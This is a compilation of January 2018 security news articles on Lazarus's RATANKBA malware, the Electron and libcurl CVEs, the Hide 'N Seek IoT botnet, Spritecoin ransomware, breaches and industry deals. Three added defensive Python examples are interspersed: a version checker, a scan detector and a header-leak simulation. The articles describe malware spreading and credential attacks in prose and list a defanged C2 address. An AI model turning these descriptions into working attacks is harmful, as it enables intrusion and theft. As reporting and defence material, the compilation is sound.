A look into the cyber arsenal used by Lazarus APT hackers in recent attacks against financial institutions
25.1.2018 securityaffairs APT

Security experts at Trend Micro have analyzed malware and a tool used by the Lazarus APT group in the recent attacks against financial institutions.
Security experts at Trend Micro have analyzed the attacks conducted by the notorious Lazarus APT group against financial institutions.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and the experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers discovered that the North Korea-linked Lazarus APT group was behind attacks on banks, including the Bangladesh cyber heist.

In the last campaigns against financial firms, the cyber spies launched watering hole attacks and leveraged a variant of the Lazarus-linked RATANKBA Trojan.

“The malware known as RATANKBA is just one of the weapons in Lazarus’ arsenal. This malicious software, which could have been active since late 2016, was used in a recent campaign targeting financial institutions using watering hole attacks. The variant used during these attacks (TROJ_RATANKBA.A) delivered multiple payloads that include hacking tools and software targeting banking systems.” reads the analysis published by Trend Micro.

“We analyzed a new RATANKBA variant (BKDR_RATANKBA.ZAEL–A), discovered in June 2017, that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified.“

The researchers identified and gained access to some servers used by the cyber spies for temporarily storing stolen data; the analysis of the backend revealed that around 55% of the victims were located in India and neighboring countries.

The majority of the victims were not using enterprise versions of Microsoft software, less than 5% of the victims were Microsoft Windows Enterprise users.

None of the victims’ IP addresses belong to a large bank or financial institution; according to Trend Micro, the victims are likely employees of three web software development companies in India and one in South Korea.

The RATANKBA Trojan is delivered via weaponized Office documents (containing topics related to cryptocurrencies and software development), CHM files, and script downloaders.

Experts noticed that the attackers don’t implement real-time communication with the malware. Once a target machine is compromised, the attackers use a Remote Controller tool to send jobs to the system, and the queue of jobs is then processed by RATANKBA.

“During our analysis, we collected a copy of the RATANKBA malware’s Lazarus Remote Controller tool. The remote controller provides a user interface that allows attackers to send jobs to any compromised endpoint. The controller gives the attackers the ability to manipulate the victims’ host by queueing tasks on the main server. RATANKBA retrieves and executes the tasks, and retrieves the collected information.” continues the analysis.

The controller tool used by the Lazarus APT implements a graphical user interface that allows hackers to push code to the server and download victim profiles from it.


Trend Micro also provided a profile of the members of the Lazarus APT group, the hackers appear to be native Korean speakers and at least one of them is believed to also understand Chinese.

“Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities.” concluded Trend Micro.


Critical code execution flaw in Electron framework impacts popular Desktop apps such as Skype and Signal
25.1.2018 securityaffairs Vulnerability

A critical RCE vulnerability in the Electron framework impacts popular desktop applications, including Skype, Signal, Slack, GitHub Desktop, Twitch, and WordPress.com.
A remote code execution vulnerability tracked as CVE-2018-1000006 was fixed in the Electron framework, which is used by popular desktop applications, including Skype, Signal, Slack, GitHub Desktop, Twitch, and WordPress.com.

Electron is an open-source framework built on Node.js, V8, and Chromium that allows developers to use web technologies such as JavaScript, HTML, and CSS to build desktop apps.

The framework is currently being developed by GitHub; the Electron dev team released versions v1.8.2-beta.4, v1.7.11, and v1.6.16 to address the issue.

“A remote code execution vulnerability has been discovered affecting Electron apps that use custom protocol handlers. This vulnerability has been assigned the CVE identifier CVE-2018-1000006.” states the Electron team in a post.

“Electron apps designed to run on Windows that register themselves as the default handler for a protocol, like myapp://, are vulnerable.

Such apps can be affected regardless of how the protocol is registered, e.g. using native code, the Windows registry, or Electron’s app.setAsDefaultProtocolClient API.”


Currently, more than 460 cross-platform desktop applications leverage the Electron framework, but the code execution flaw affects only Windows apps that use custom protocol handlers; macOS and Linux are not vulnerable to the issue.

All three releases are available for download on GitHub.

The experts also provided a workaround to avoid the exploitation of the vulnerability.

“If for some reason you are unable to upgrade your Electron version, you can append “--” as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options. The double dash “--” signifies the end of command options, after which only positional parameters are accepted,” Electron explains.

Electron developers are advised to update their application immediately.

“We’ve published new versions of Electron which include fixes for this vulnerability: 1.8.2-beta.4, 1.7.11, and 1.6.16. We urge all Electron developers to update their apps to the latest stable version immediately.” Electron team added.
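When triaging an Electron dependency against the three fixed releases named above, the prerelease ordering matters: 1.8.2-beta.3 is still vulnerable while 1.8.2-beta.4 is fixed. The following is an added helper, not Electron project code; it assumes that release lines newer than 1.8 are fixed (an assumption, since the post only names the 1.6, 1.7 and 1.8 fixes) and that lines older than 1.6 never received a fix.

```python
"""CVE-2018-1000006 version triage: is this Electron version fixed?

Added example, not from Electron. Fixed releases are the three named in
the post; semver prerelease ordering is implemented so beta tags compare
correctly against each other and against the final release.
"""
import re

FIXED = {(1, 6): "1.6.16", (1, 7): "1.7.11", (1, 8): "1.8.2-beta.4"}

_VER_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$")


def parse_version(text):
    """Return ((major, minor, patch), prerelease identifiers)."""
    m = _VER_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a semver string: {text!r}")
    nums = tuple(int(m.group(i)) for i in (1, 2, 3))
    pre = tuple(m.group(4).split(".")) if m.group(4) else ()
    return nums, pre


def _pre_key(pre):
    # semver rules: a final release sorts after any prerelease with the same
    # numbers; numeric identifiers compare numerically and sort before
    # alphanumeric ones; a shorter identifier list sorts first.
    if not pre:
        return (1,)
    return (0,) + tuple((0, int(p), "") if p.isdigit() else (1, 0, p) for p in pre)


def compare(a, b):
    """-1, 0 or 1 as version a is lower than, equal to, or higher than b."""
    na, pa = parse_version(a)
    nb, pb = parse_version(b)
    ka, kb = (na, _pre_key(pa)), (nb, _pre_key(pb))
    return (ka > kb) - (ka < kb)


def is_fixed(version):
    """True if the version carries the CVE-2018-1000006 fix."""
    nums, _ = parse_version(version)
    line = nums[:2]
    if line in FIXED:
        return compare(version, FIXED[line]) >= 0
    # Assumption: lines newer than the newest fixed line are fixed,
    # lines older than 1.6 were not patched.
    return line > max(FIXED)


if __name__ == "__main__":
    for v in ("1.6.15", "1.6.16", "1.7.10", "1.7.11", "1.8.2-beta.3", "1.8.2-beta.4", "1.8.2"):
        print(f"{v:14} {'fixed' if is_fixed(v) else 'VULNERABLE'}")
```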


New HNS botnet has already compromised more than 20,000 IoT devices
25.1.2018 securityaffairs BotNet  IoT

A new botnet called Hide ‘N Seek (HNS botnet) appeared in the threat landscape; the malware is rapidly spreading, infecting unsecured IoT devices, mainly IP cameras.
The HNS botnet was first spotted on January 10th by malware researchers from Bitdefender, then it disappeared for a few days, and it resurfaced over the weekend.

The number of infected systems grew from 12 at the time of the discovery to over 20,000 bots at the time of writing.


“Bitdefender researchers have uncovered an emerging botnet that uses advanced communication techniques to exploit victims and build its infrastructure. The bot, dubbed HNS, was intercepted by our IoT honeypot system following a credentials dictionary attack on the Telnet service.” states the analysis from Bitdefender.

“The samples identified in our honeypots on Jan. 10 revolved around IP cameras manufactured by a Korean company. These devices seemed to play a major role in the botnet as, out of the 12 IP addresses hardcoded in the sample, 10 used to belong to Focus H&S devices. The new version, observed on Jan. 20, dropped the hardcoded IPs.”

Recently security experts spotted other IoT botnets, most of them linked to the Mirai botnet, such as Satori, Okiru, and Masuta, but the HNS botnet has a different genesis and doesn’t share the source code.

Researchers at Bitdefender found similarities between the HNS and Hajime botnets: unlike Mirai, Hajime doesn’t use C&C servers and instead implements a peer-to-peer network.

Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes and its modular structure allows operators to add new capabilities on the fly.

“It is the second known IoT botnet to date, after the notorious Hajime botnet, that has a decentralized, peer-to-peer architecture,” states Bitdefender. “However, if in the case of Hajime, the P2P functionality was based on the BitTorrent protocol, here we have a custom-built P2P communication mechanism.”

The HNS malware is able to infect a series of IoT devices using the same exploit as Reaper; the current version is able to receive and execute several types of commands, such as data exfiltration, code execution and interference with a device’s operation.

According to the experts, the botnet is still under development, it doesn’t include DDoS capabilities, a circumstance that suggests it is intended to be deployed as a proxy network.

“While IoT botnets have been around for years, mainly used for DDoS attacks, the discoveries made during the investigation of the Hide and Seek bot reveal greater levels of complexity and novel capabilities such as information theft – potentially suitable for espionage or extortion.” concluded Bitdefender.

“It is also worth noting that the botnet is undergoing constant redesign and rapid expansion.”

The bot spreads by randomly generating a list of IP addresses that could potentially be compromised. It then initiates a raw socket SYN connection to each potential target and continues communication with those devices that answer the request on specific destination ports (23, 2323, 80, 8080).

Once the bot has established a connection it will look for a specific banner (“buildroot login:”) presented by the victim. If it gets this login banner, it attempts to log in using a list of default credentials. If the credentials are not correct, the botnet launches a dictionary attack using a hardcoded list.

Once connected to the victim, the malware will run through a “state machine” to determine the type of target device and select the most suitable compromise method. Experts explained that if the device shares the same network with the bot, the bot sets up a TFTP server to allow the victim to download the malicious code from the bot. If the victim is located on the internet, the bot will attempt to use a specific remote payload delivery method to get the target device to download and execute the sample.

“These exploitation techniques are preconfigured and are located in a memory location that is digitally signed to prevent tampering. This list can be updated remotely and propagated among infected hosts.” continues the analysis.

Experts observed that the HNS botnet cannot establish persistence on infected devices: once the device restarts, the malware is removed, which means that botnet operators have to continuously manage the HNS botnet.

Let’s monitor the growth of the new-born botnet.
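The spreading mechanism described in both Hide ‘N Seek write-ups above (random targets, raw SYNs to ports 23, 2323, 80 and 8080) leaves a distinctive footprint in flow or firewall logs: one source touching many distinct hosts on those ports in a short window. The following detector is an added example, not Bitdefender’s code; the log line format and all sample lines are constructed, and the window and threshold are tunable assumptions.

```python
"""Detect Hide 'N Seek-style worm scanning in constructed flow logs.

Added example, not from the original analysis. Each constructed log line is
"<ISO timestamp> <src ip> <dst ip> <dst port> <tcp flags>"; flags "S" means
a bare SYN. A source is reported when it sends SYNs to at least
`min_targets` distinct hosts on the bot's ports inside any `window`.
"""
from collections import defaultdict
from datetime import datetime, timedelta

HNS_PORTS = {23, 2323, 80, 8080}  # destination ports named in the analysis


def parse_line(line):
    ts, src, dst, dport, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), flags


def find_scanners(lines, window=timedelta(seconds=60), min_targets=10):
    """Return {src: max distinct HNS-port targets seen within one window}
    for every source that reaches the threshold."""
    syns = defaultdict(list)
    for line in lines:
        ts, src, dst, dport, flags = parse_line(line)
        if dport in HNS_PORTS and flags == "S":
            syns[src].append((ts, dst))

    hits = {}
    for src, events in syns.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({dst for _, dst in events[start:end + 1]})
            best = max(best, distinct)
        if best >= min_targets:
            hits[src] = best
    return hits


def sample_log():
    """Constructed telemetry: one scanner, one chatty-but-benign client,
    one host that touches many targets but far too slowly to be a worm."""
    base = datetime(2018, 1, 20, 12, 0, 0)
    lines = []
    for i in range(12):  # scanner: 12 distinct hosts on telnet ports in 22 s
        t = base + timedelta(seconds=2 * i)
        lines.append(f"{t.isoformat()} 203.0.113.7 198.51.100.{i + 1} {23 if i % 2 else 2323} S")
    for i in range(15):  # benign: many SYNs, but all to one web server
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} 192.0.2.10 198.51.100.200 80 S")
    for i in range(12):  # slow: 12 hosts on 8080 spread over 20 minutes
        t = base + timedelta(seconds=100 * i)
        lines.append(f"{t.isoformat()} 192.0.2.20 198.51.100.{50 + i} 8080 S")
    return lines


if __name__ == "__main__":
    for src, count in find_scanners(sample_log()).items():
        print(f"{src}: {count} distinct targets on HNS ports within 60 s")
```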


libcurl has had an authentication leak bug dating back to before September 1999
25.1.2018 securityaffairs Vulnerability

According to a security advisory, libcurl is affected by a couple of issues, one of them might cause the leakage of authentication data to third parties.
libcurl is a free and easy-to-use client-side URL transfer library, it builds and works identically on numerous platforms.

The problem is related to the way it handles custom headers in HTTP requests.

“When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the `Location:` response header value.” states the advisory.

“Sending the same set of headers to subsequent hosts is in particular a problem for applications that pass on custom `Authorization:` headers, as this header often contains privacy sensitive information or data that could allow others to impersonate the libcurl-using client’s request. We are not aware of any exploit of this flaw.”

Applications that pass on custom authorization headers could leak credentials or information that could be abused by attackers to impersonate the libcurl-using client’s request.

This vulnerability tracked as CVE-2018-1000007 has been present since before curl 6.0, back to before September 1999. Affected versions are libcurl 7.1 to and including 7.57.0, later versions (7.58.0) are not affected, the patch was published on GitHub.

“In libcurl version 7.58.0, custom `Authorization:` headers will be limited the same way other such headers is controlled within libcurl: they will only be sent to the host used in the original URL unless libcurl is told that it is ok to pass on to others using the `CURLOPT_UNRESTRICTED_AUTH` option.” states the advisory.

“This solution creates a slight change in behavior. Users who actually want to pass on the header to other hosts now need to give curl that specific permission. You do this with [--location-trusted](https://curl.haxx.se/docs/manpage.html#--location-trusted) with the curl command line tool.”
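The redirect behaviour described in the advisory, before and after 7.58.0, as an added simulation written for this article (it is not libcurl's code; the URLs, the redirect chain and the header values are constructed, and host comparison is simplified to the hostname):

```python
"""Model of libcurl's custom-header forwarding across redirects (CVE-2018-1000007).

Hypothetical simulation written for this article, not libcurl's own code. It mirrors
the advisory's description: before 7.58.0 every custom header, Authorization included,
was resent to whatever host a 30x Location pointed at; from 7.58.0 a custom
Authorization header stays with the original host unless CURLOPT_UNRESTRICTED_AUTH
(the command-line --location-trusted) is set.
"""
from urllib.parse import urlsplit

AUTH_HEADER = "authorization"


def same_host(url_a: str, url_b: str) -> bool:
    """Compare only the hostname (simplifying assumption of this model)."""
    return urlsplit(url_a).hostname == urlsplit(url_b).hostname


def headers_for_hop(original_url: str, hop_url: str, custom_headers: dict,
                    *, patched: bool, unrestricted_auth: bool = False) -> dict:
    """Return the custom headers the client would send to hop_url."""
    if not patched:
        # libcurl 7.1 .. 7.57.0: the whole custom set goes to every redirect target.
        return dict(custom_headers)
    if unrestricted_auth or same_host(original_url, hop_url):
        return dict(custom_headers)
    # 7.58.0 default: drop the custom Authorization header when leaving the original
    # host; other custom headers are still forwarded.
    return {k: v for k, v in custom_headers.items() if k.lower() != AUTH_HEADER}


def follow(original_url: str, responses: dict, custom_headers: dict,
           *, patched: bool, unrestricted_auth: bool = False, max_redirs: int = 5) -> list:
    """Walk a constructed redirect chain and record (host, headers sent) per hop.

    `responses` maps a URL to (status, location) as a stand-in for real servers.
    """
    sent = []
    url = original_url
    for _ in range(max_redirs + 1):
        hdrs = headers_for_hop(original_url, url, custom_headers,
                               patched=patched, unrestricted_auth=unrestricted_auth)
        sent.append((urlsplit(url).hostname, hdrs))
        status, location = responses[url]
        if status // 100 != 3 or location is None:
            break
        url = location
    return sent


def hosts_that_saw_auth(sent: list) -> list:
    """Hosts that received Authorization; any host past the first is the leak."""
    return [host for host, hdrs in sent if any(k.lower() == AUTH_HEADER for k in hdrs)]


# Constructed chain: the API host answers with a 302 to an unrelated third-party host.
ORIGIN = "https://api.example.com/v1/report"
CHAIN = {
    ORIGIN: (302, "https://cdn.third-party.example/report.pdf"),
    "https://cdn.third-party.example/report.pdf": (200, None),
}
CUSTOM_HEADERS = {"Authorization": "Bearer <placeholder-token>", "X-Request-Id": "demo-1"}


def scenarios() -> dict:
    """Which hosts see the Authorization header under each libcurl behaviour."""
    return {
        "7.57.0 and earlier": hosts_that_saw_auth(
            follow(ORIGIN, CHAIN, CUSTOM_HEADERS, patched=False)),
        "7.58.0 default": hosts_that_saw_auth(
            follow(ORIGIN, CHAIN, CUSTOM_HEADERS, patched=True)),
        "7.58.0 + CURLOPT_UNRESTRICTED_AUTH": hosts_that_saw_auth(
            follow(ORIGIN, CHAIN, CUSTOM_HEADERS, patched=True, unrestricted_auth=True)),
    }


if __name__ == "__main__":
    for label, hosts in scenarios().items():
        print(f"{label}: Authorization reached {hosts}")
```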

libcurl is also affected by an “HTTP/2 trailer out-of-bounds read” vulnerability tracked as CVE-2018-1000005.

The issue lies in the code that creates HTTP/1-like headers from the HTTP/2 trailer data: it appends a string like `":"` to the target buffer, which was recently changed to `": "` (a space was added after the colon), but the associated length math was not updated correspondingly.

“When accessed, the data is read out of bounds and causes either a crash or that the (too large) data gets passed to the libcurl callback. This might lead to a denial-of-service situation or an information disclosure if someone has a service that echoes back or uses the trailers for something.” reads the advisory.

The advisory also notes that “reading an HTTP/2 trailer could mess up future trailers since the stored size was one byte less than required.”

Affected versions are libcurl 7.49.0 up to and including 7.57.0; experts are not aware of any exploit of this vulnerability in the wild.


Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data
25.1.2018 securityaffairs
Ransomware

Fortinet discovered a strain of ransomware dubbed Spritecoin ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.
Researchers from Fortinet FortiGuard Labs have discovered a strain of ransomware that only accepts Monero payments from victims and pretends to be a cryptocurrency-related password store.

The ransomware poses as a “spritecoin” wallet: it asks users to create their desired password, but instead of downloading the blockchain it encrypts the victim’s data files.

The malware asks for a 0.3 Monero ransom ($105 USD at the time of writing) and drops a ransom note reading “Your files are encrypted.” on the target system.

The malware includes an embedded SQLite engine, which leads experts to believe it also implements a credential-harvesting feature targeting the Chrome and Firefox credential stores. The malicious code appends the .encrypted extension to encrypted files (e.g. resume.doc.encrypted).

While decrypting the files, the Spritecoin ransomware also deploys another piece of malware that is able to harvest certificates, parse images, and control the web camera.

“In a cruel twist, if the victim decides to pay and obtain a decryption key they are then delivered a new malicious executable [80685e4eb850f8c5387d1682b618927105673fe3a2692b5c1ca9c66fb62b386b], detected as W32/Generic!tr.” reads the report.

“While we have not yet fully analyzed this malicious payload, we can verify that it does have the capability to activate web cameras and parse certificates and keys that will likely leave the victim more compromised than before.”

The experts speculate the ransomware is being spread via forum spam that targets users interested in cryptocurrency.

“Ransomware is usually delivered via social engineering techniques, but can also be delivered without user interaction via exploits. These often arrive (but are not limited to) via email, exploit kits, malicious crafted Excel/Word/PDF macros, or JavaScript downloaders.” states the analysis published by Fortinet.

“The attacker often uses social engineering and carefully crafted malicious emails to trick and entice the victim to run these executables. These files are often seen using compelling file names to lure the victim into opening the file. Usually, the ransomware requires some user interaction to successfully compromise the victim’s machine.”

“In this case, the threat arrives as a “SpriteCoin” package (spritecoind[.]exe) under the guise of a SpriteCoin crypto-currency wallet.”

Once installed on the victim’s machine, the malware will present a user with a prompt to “Enter your desired wallet password.”

When the victims provide their credentials, the Spritecoin ransomware informs them that it is downloading the blockchain, while it is actually encrypting their files.

The ransomware connects to a Tor site via an Onion proxy (http://jmqapf3nflatei35[.]onion.link/*) that allows the victim to communicate with the attacker’s website without the need for a Tor connection.

Further details, including IoCs are included in the report.


Facebook Acquires ID Verification Startup Confirm
24.1.2018 securityweek
Social

Facebook has acquired Confirm, a Boston-based startup that specializes in identity verification solutions. Financial terms of the deal have not been disclosed.

Confirm has developed APIs and SDKs that can be integrated into applications that require easy and secure authentication of driver’s licenses and other government IDs. The company’s product leverages advanced pattern analysis and forensic checks to determine if an ID is legitimate.

Before being acquired by Facebook, the company’s website said its products had been used by more than 750 organizations around the world to authenticate customer identity documents.

“When we launched Confirm, our mission was to become the market's trusted identity origination platform for which other multifactor verification services can build upon,” reads a message posted on the Confirm.io website following the acquisition. “Now, we're ready to take the next step on our journey with Facebook.”

Confirm has informed customers that it will wind down its existing ID authentication products. The company’s employees will join Facebook in Boston.

“We are excited to welcome the Confirm team to Facebook,” a Facebook spokesperson told SecurityWeek. “Their technology and expertise will support our ongoing efforts to keep our community safe.”

Facebook asks users to send a scan or photo of their ID to show account ownership or confirm their name. It is possible that the technology obtained as a result of the Confirm acquisition will be used to improve this system.

Confirm was founded by Walter Doyle, whose consumer mobile company WHERE.com was acquired by PayPal in 2011; mobile entrepreneur and venture capitalist Bob Geiman; and Ralph Rodriguez, founder of Delfigo Security, a multifactor authentication company acquired by IBM.

In January 2016, the company announced that it had raised $4 million in a seed funding round.


Bell Canada Hit by Data Breach
24.1.2018 securityweek Incident

Bell Canada has started informing customers that their personal data has been compromised in a breach that reportedly affects up to 100,000 individuals.

Bell told customers that their names and email addresses were accessed by hackers, but the company said in an emailed statement that the attackers also obtained phone numbers, usernames and/or account numbers for a limited number of people. The telecoms company, however, says there is no evidence that credit card or banking information has been compromised.

In response to the incident, Bell has implemented additional authentication and identification requirements for accessing accounts. The company has also advised users to frequently change their password and security questions, and regularly review their financial and online accounts for unauthorized activity.

“The protection of consumer and corporate information is of primary importance to Bell,” John Watson, Executive Vice-President of Customer Experience at Bell Canada, told customers. “We work closely with the RCMP and other law enforcement agencies, government bodies and the broader technology industry to combat the growth of cyber crimes.”

Lisa Baergen, marketing director with Vancouver-based NuData Security, a Mastercard company, pointed out that even limited information such as names and email addresses can be useful to malicious actors.

“We all know bad actors are very talented at preparing fraud schemes with that information, such as phishing scams or dictionary attacks – where fraudsters try certain common passwords based on the user’s personal information,” Baergen said.

“Bell is doing the right thing by evaluating the extent of the damage and keeping customers updated,” she added. “However, to avoid damage after a breach, companies that share clients with Bell can consider applying multi-layered security solutions based on passive biometrics to protect their business and their customers from account takeover or another type of fraud. Online security technologies that evaluate a user or a transaction based on their behavior and not only on their – potentially stolen – static information, thwart all fraudulent attempts that inevitably come after a data breach.”

This is the second time Bell Canada has informed customers of a data breach. In May last year, the company admitted that approximately 1.9 million active email addresses and roughly 1,700 names and active phone numbers were accessed by a hacker.

Bell told SecurityWeek that the latest incident is unrelated to the cyberattack disclosed in May.


Apple Patches Meltdown Flaw in Older Versions of macOS
24.1.2018 securityweek Apple

Apple on Tuesday released security updates for a majority of its products, and it patched the vulnerability that allows Meltdown attacks in earlier versions of its Mac operating system.

Apple rolled out the first mitigations for the Meltdown attack before the flaws were disclosed, in early December, with the release of iOS 11.2, macOS 10.13.2 and tvOS 11.2. Protections against Spectre attacks were added on January 8 with the release of iOS 11.2.2, macOS High Sierra 10.13.2 Supplemental Update, and Safari 11.0.2.

The latest security updates released by the tech giant for Mac computers patch 17 vulnerabilities, including a kernel flaw that allows Meltdown attacks (CVE-2017-5754) in macOS Sierra 10.12.6 and OS X El Capitan 10.11.6.

The update for High Sierra also addresses several other kernel vulnerabilities that can be exploited to read restricted memory and execute arbitrary code with elevated privileges, including ones found by Jann Horn, the Google researcher who independently discovered the Meltdown and Spectre weaknesses.

Other macOS vulnerabilities patched on Monday affect the audio, cURL, LinkPresentation, QuartzCore, sandbox, security, WebKit and Wi-Fi components.

The updates for macOS High Sierra 10.13.2, macOS Sierra 10.12.6, and OS X El Capitan 10.11.6 also fix the IOHIDFamily local privilege escalation vulnerability disclosed by a researcher on New Year’s Eve. The expert disclosed the flaw without giving Apple the chance to release a patch, arguing that it’s not remotely exploitable and the PoC he made public is not stealthy.

iOS 11.2.5 patches 13 security holes, including in the audio, Bluetooth, kernel, LinkPresentation, QuartzCore, security, and WebKit components. Some of these flaws are the same ones that affect macOS.

Since watchOS and tvOS are also based on iOS, a majority of the vulnerabilities have also been patched in the Apple Watch and Apple TV operating systems.

The WebKit flaws have also been resolved by Apple in iCloud for Windows, iTunes for Windows, and Safari.

Despite being among the first vendors to start releasing patches, Apple is facing class action lawsuits over the Meltdown and Spectre CPU vulnerabilities. Apple’s processors are affected due to the fact that they use ARM technology.


Amazon Acquires Threat Hunting Firm Sqrrl
24.1.2018 securityweek Security

Sqrrl, a Cambridge, Mass.-based big data analytics startup that is commercializing NSA technology to help organizations detect threats lurking in their infrastructure, has been acquired by Amazon.

The company announced Tuesday that it has been acquired by Amazon and would be joining the Amazon Web Services (AWS) family.

Founded in 2012, Sqrrl has raised more than $28 million in funding, including $12.3 million in June 2017 and $7 million in February 2015.

At the core of Sqrrl Enterprise is Accumulo, a database project that began at the NSA in 2008 when the spy agency was searching for a platform that could meet its growing data challenges. In 2011, NSA open sourced Accumulo, which has since become a project at the Apache Foundation. Accumulo was inspired by Google's BigTable design and is built on top of Apache Hadoop, Zookeeper, and Thrift.

In the summer of 2012, a group of the core creators, committers, and contributors to the Accumulo project co-founded Sqrrl.

Built on top of Accumulo, Sqrrl’s software analyzes masses of data in order to uncover hidden patterns, trends, and links, and enables security analysts to visually navigate the relationships between assets and actors involved in a given event. As a result, security teams can detect and mitigate data breaches resulting from cyber-espionage, insider threats, and other types of hard-to-detect attacks.

Six of the seven original members of Sqrrl had worked for the NSA.

The company did not provide details on how its technology would be integrated into AWS offerings, but it could be used to enhance Macie, a recently-launched security service that helps AWS users discover, classify and protect sensitive data. Amazon Macie uses machine learning to automatically identify and protect personally identifiable information (PII), intellectual property and other sensitive data, and informs users of how their data is being accessed or moved via dashboards and alerts.

“For now, it is business as usual at Sqrrl,” noted Mark Terenzoni, Sqrrl CEO. “We will continue to work with customers to provide advanced threat hunting capabilities. And, over time, we’ll work with AWS to do even more on your behalf.”

Terms of the acquisition were not disclosed, though Axios reported in December that talks were under way for Amazon to buy Sqrrl for "a bit north" of $40 million.

Sqrrl's financial backers include Spring Lake Equity Partners, Matrix Partners, Rally Ventures, Accomplice, and Atlas Venture.


Clothing Retailer Fallas Hit by Payment Card Breach
24.1.2018 securityweek Security

Clothing retailer National Stores, which operates 340 stores across the United States, informed customers this week that their payment card information may have been stolen by hackers.

Los Angeles, California-based National Stores, Inc. operates Fallas, Fallas Paredes, Fallas Discount Stores, Factory 2-U, Anna's Linens, and Falas stores in 22 U.S. states and Puerto Rico.

On December 22, the company learned from a third party that its payment systems may have been breached by malicious hackers. An investigation launched by National Stores revealed that its point-of-sale (PoS) systems had been infected with malware.

According to the company, the malware may have stolen credit card information between July 16 and December 11, 2017. The compromised data includes names, payment card numbers, expiration dates, and security codes.

The list of potentially impacted stores includes more than 270 locations in California, New York, Nevada, Texas, Arizona, New Mexico, Illinois, Florida, Oklahoma, New Jersey, Massachusetts, Virginia, North Carolina, South Carolina, Maryland, Wisconsin, Michigan, Ohio, Georgia, and Puerto Rico. Over 90 of the affected stores are in California, followed by Texas, with 45 locations.

“We have been working closely with the FBI, cybersecurity experts, and payment card brands to contain the incident and protect our customers' payment cards,” said Michael Fallas, CEO of National Stores. “The malware has been removed from our system, and no customers will be responsible for any fraudulent charges to their accounts. We are in the process of strengthening the security of our point of sale systems to prevent this from happening in the future.”

The retailer has advised customers to keep a close eye on account statements and credit reports, and immediately notify their bank of any suspicious activity.

Fallas is not the only clothing retailer to suffer a payment card breach in recent years. The list also includes Brooks Brothers, Buckle, Forever 21 and Eddie Bauer.


World Economic Forum Announces Global Centre for Cybersecurity
24.1.2018 securityweek Cyber

The World Economic Forum (WEF) is establishing a new Global Centre for Cybersecurity "to help build a safe and secure global cyberspace."

This was announced at the 48th Annual Meeting currently taking place in Davos-Klosters, Switzerland. This year's WEF theme is Creating a Shared Future in a Fractured World. WEF's annual Global Risk Report for 2018 shows cyberattacks are now considered the third most serious global threat behind only extreme weather and natural disasters. Data fraud/theft is fourth.

Aerial photo from the futuristic and stylish Intercontinental Hotel in Davos, Switzerland. The Annual Meeting of the World Economic Forum takes place in Davos-Klosters, Switzerland from January 23 to 26, 2018. (Image Credit: World Economic Forum)

The Global Centre for Cybersecurity is seen as providing a unique opportunity to promote a global public/private response to increasing cyber threats. Alois Zwinggi, managing director at the WEF and head of the new center said cybercrime is currently costing the world economy $500 billion annually and is still growing. "As such, addressing the topic is really important for us. The Forum sees a need for much greater collaboration in that space."

WEF describes five main areas of operation for the center: consolidating existing initiatives (such as its Cyber Resiliency Playbook); establishing a library of best practices; improving partners' understanding of cybersecurity; promoting a regulatory framework; and serving as a think tank for future cybersecurity scenarios (such as the fourth industrial revolution and the effect of quantum computing). Although not specified per se, a consistent theme for the new center will be global cybersecurity information sharing.

Rob Wainwright, Executive Director of Europol, said that the center has "absolutely full support from Europol." He explained that Europol (which includes the European Cybercrime Centre) can only function as well as it does because of the public/private networks it has established in Europe: "but it is not nearly enough... That's why I am so delighted that WEF, with its unique networking capability, is now establishing this Global Centre for Cybersecurity -- because it will interconnect a large, dynamic, a very important business community... and will take us to a new level of public/private cooperation."

The Global Centre for Cybersecurity will be located in Geneva, Switzerland, and will be operational in March 2018. Although under the umbrella of WEF, it will be autonomous. WEF spokesperson Georg Schmitt told SecurityWeek that it will be funded by members, with an initial investment of several million Swiss francs from the forum itself. Ongoing, he said in an email, "partner companies will have to pay a certain fee to join. Fees for governments, academia and civil society will be waived. We are planning to hire 20-30 staff this year alone."

It's not yet known how many 'government partners' will join the center. "We will be able to announce the government partners at a later stage, but to give you an impression: at our preparatory meeting in November representatives of almost 20 governments participated, including several G7 and G20 countries."

Effective threat information sharing between the public and private sectors is often seen as the holy grail of cybersecurity -- but has so far proved just as elusive. However, business, like cybercrime, is transnational; and if any organization is well-suited to tackle the problem it is a global business organization. "The announcement of the creation of a Global Security Centre at WEF is welcomed as a potentially hugely valuable way forward in coordinating the activities of nations against this scourge of modern times," Jim Palmer, CISO at ThinkMarble told SecurityWeek. "That said," he continued, "the proof of its effectiveness will be in the pudding -- adequate funding and the positive cooperation from all will be an essential enabler. As a cyber and information security company, we watch with interest."

Mark Noctor, VP EMEA at Arxan Technologies, is hopeful. "We are delighted to see a body with the global importance of the WEF addressing the growing sophistication of cyber threats," he told SecurityWeek. "This move by the WEF will help governments and international organizations to work more closely with industry, manufacturers and software providers to create safe environments and eliminate cyber threats."

But there are many who don't believe that WEF actually delivers on its potential. Bono famously described it as 'fat cats in the snow'. It has also been described as 'a mix of pomp and platitudes'. And there are many in the security industry who do not believe the new Center will achieve much.

"This is what happens when you get a bunch of politicians in a room who have no clear understanding on cybersecurity and the threats," comments Joseph Carson, Chief Security Scientist at Thycotic. "When the need to have a Global Centre for Cybersecurity is being discussed at the World Economic Forum it becomes a pointless political debate usually without industry experts' input."

